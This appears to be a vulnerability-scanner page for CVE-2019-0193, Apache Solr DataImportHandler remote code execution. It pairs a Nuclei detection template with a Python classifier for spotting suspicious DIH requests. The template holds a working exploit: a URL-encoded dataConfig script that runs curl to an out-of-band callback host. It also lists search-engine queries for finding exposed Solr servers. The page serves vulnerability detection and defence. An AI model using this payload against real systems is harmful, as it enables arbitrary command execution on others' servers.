Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
ID: CVE-2019-0193
Severity: high
Author: pdteam
Tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub
Description
Apache Solr is vulnerable to remote code execution via the DataImportHandler (DIH), an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request’s “dataConfig” parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
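A defender-side check for the request shape described above, as an added example that is not part of the template or of Solr: it classifies a captured request to the DIH handler by whether it supplies an inline dataConfig and whether that config carries script constructs. The function name, labels and sample requests are constructed for illustration, and it assumes your proxy or WAF logs record the form-encoded body.

```python
import re
from urllib.parse import urlsplit, parse_qs

# DIH handler path, in the shape of the template's second request.
DIH_PATH = re.compile(r"^/solr/[^/]+/dataimport/?$")
# Constructs that make an inline DIH config executable: a <script> block,
# or an entity that routes rows through a script transformer.
SCRIPT_MARKERS = re.compile(
    r"<\s*script\b|transformer\s*=\s*[\"'][^\"']*script:", re.I)

def classify_dih_request(target: str, body: str = "") -> str:
    """Return 'ignore', 'inline-config' or 'inline-script' for one request.

    target is the request target (path plus query string); body is a
    form-encoded POST body. Solr reads parameters from both, so they are merged.
    """
    parts = urlsplit(target)
    if not DIH_PATH.match(parts.path):
        return "ignore"
    params = parse_qs(parts.query, keep_blank_values=True)
    for key, values in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(values)
    configs = params.get("dataConfig", [])
    if not configs:
        return "ignore"  # DIH call that uses the server-side config file
    if any(SCRIPT_MARKERS.search(c) for c in configs):
        return "inline-script"
    return "inline-config"

# Constructed sample requests (target, body); the script body is a no-op.
SAMPLES = [
    ("/solr/demo/dataimport?command=status", ""),
    ("/solr/demo/dataimport?indent=on&wt=json",
     "command=full-import&debug=true&dataConfig="
     "%3CdataConfig%3E%3Cdocument%2F%3E%3C%2FdataConfig%3E"),
    ("/solr/demo/dataimport?indent=on&wt=json",
     "command=full-import&debug=true&dataConfig=%3CdataConfig%3E%3Cscript%3E"
     "function+f(row)%7Breturn+row%3B%7D%3C%2Fscript%3E%3C%2FdataConfig%3E"),
    ("/solr/demo/dataimport?dataConfig="
     "%3Centity+transformer%3D%22script%3Af%22%2F%3E", ""),
    ("/solr/demo/select?q=dataConfig", ""),
]

if __name__ == "__main__":
    for target, body in SAMPLES:
        print(classify_dih_request(target, body), target)
```

On Solr 8.2.0 and later, any request supplying dataConfig is worth reviewing, since per the remediation text the parameter is only honoured when "enable.dih.dataConfigParam" has been set to true.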
YAML Source
id: CVE-2019-0193

info:
  name: Apache Solr DataImportHandler <8.2.0 - Remote Code Execution
  author: pdteam
  severity: high
  description: |
    Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
    - https://paper.seebug.org/1009/
    - https://issues.apache.org/jira/browse/SOLR-13669
    - https://nvd.nist.gov/vuln/detail/CVE-2019-0193
    - https://lists.apache.org/thread.html/1addbb49a1fc0947fb32ca663d76d93cfaade35a4848a76d4b4ded9c@%3Cissues.lucene.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2019-0193
    cwe-id: CWE-94
    epss-score: 0.9605
    epss-percentile: 0.99452
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query:
      - cpe:"cpe:2.3:a:apache:solr"
      - http.title:"apache solr"
      - http.title:"solr admin"
    fofa-query:
      - title="solr admin"
      - title="apache solr"
    google-query:
      - intitle:"apache solr"
      - intitle:"solr admin"
  tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}
        Accept-Language: en
        Connection: close
      - |
        POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"

    extractors:
      - type: regex
        name: core
        group: 1
        regex:
          - '"name"\:"(.*?)"'
        internal: true
# digest: 490a0046304402205a880f5cfde6e5aeaab19b2343d99f84240d8641ad2a26d051d109ea80bd31f502201d01d93c38b906d9e8b0f2083d1d828fd12abe4a8e638eee19b9c016eb1143d4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-0193.yaml"